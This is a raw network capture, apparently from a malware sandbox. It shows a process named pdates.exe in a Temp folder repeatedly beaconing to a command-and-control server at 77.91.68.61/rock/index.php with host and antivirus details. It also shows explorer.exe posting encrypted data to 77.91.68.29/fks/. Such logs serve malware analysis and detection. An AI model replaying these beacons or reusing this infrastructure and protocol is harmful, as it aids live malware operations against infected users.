Jul 27, 2023 01:33:10.378555059 CEST	2865	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:10.427519083 CEST	2866	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
330	192.168.2.5	50050	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:29.936180115 CEST	3935	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:29.984077930 CEST	3935	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:29 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
331	192.168.2.5	50051	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:30.145085096 CEST	3937	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:30.192879915 CEST	3937	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
332	192.168.2.5	50052	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:30.573605061 CEST	3938	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:30.622680902 CEST	3938	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
333	192.168.2.5	50053	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:30.912329912 CEST	3939	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:30.961447954 CEST	3939	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:30 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
334	192.168.2.5	50054	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:31.338471889 CEST	3940	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:31.387111902 CEST	3940	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
335	192.168.2.5	50055	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:31.682132006 CEST	3941	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:31.731987953 CEST	3941	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
336	192.168.2.5	50056	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:32.667866945 CEST	3942	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:32.716526031 CEST	3942	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
337	192.168.2.5	50057	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:33.877027988 CEST	3943	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:33.925394058 CEST	3943	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
338	192.168.2.5	50058	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:34.325707912 CEST	3944	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:34.374025106 CEST	3944	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
339	192.168.2.5	50059	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:34.534774065 CEST	3948	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:34.582444906 CEST	3948	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.5	49750	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:10.642268896 CEST	2867	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:10.693387032 CEST	2868	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
340	192.168.2.5	50060	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:34.733973026 CEST	3949	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:34.782747984 CEST	3949	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
341	192.168.2.5	50061	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:34.940650940 CEST	3950	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:34.988254070 CEST	3951	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:34 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
342	192.168.2.5	50062	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:35.146557093 CEST	3953	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:35.195579052 CEST	3953	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
343	192.168.2.5	50063	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:35.395687103 CEST	3954	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:35.444358110 CEST	3954	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
344	192.168.2.5	50064	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:35.594774961 CEST	3956	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:35.643346071 CEST	3957	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
345	192.168.2.5	50065	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:35.798310041 CEST	3957	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:35.847604036 CEST	3958	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
346	192.168.2.5	50066	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:36.015176058 CEST	3958	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:36.064477921 CEST	3959	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
347	192.168.2.5	50067	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:36.236660957 CEST	3959	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:36.286286116 CEST	3960	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
348	192.168.2.5	50068	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:36.484848976 CEST	3960	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:36.534332037 CEST	3961	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
349	192.168.2.5	50069	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:34:36.711282969 CEST	3961	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:34:36.759227991 CEST	3961	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:34:36 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.5	49751	77.91.68.29	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:10.665541887 CEST	2867	OUT	POST /fks/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rvljh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 309 Host: 77.91.68.29
Jul 27, 2023 01:33:10.665574074 CEST	2868	OUT	Data Raw: 14 6d 14 7d 43 65 17 82 ff 74 d1 57 05 d3 11 27 47 f5 86 50 b8 14 19 46 ea 98 34 d4 f5 de bb e7 e5 a8 44 c8 bf ff 64 d4 77 01 7d b1 74 f5 59 fb 08 ff e2 b6 02 7a b6 b5 08 2d 62 7f 1f e1 68 05 94 04 50 e7 29 af a1 d5 f3 c9 39 df 28 fc 90 39 ef 3f Data Ascii: m}CetW'GPF4Ddw}tYz-bhP)9(9?@\{nx[-(wp \Tir0FJP5&!pZ`JT=aibRf~-aKHW&f,l?ZPoG$U6`5@ndHb'6i82"S
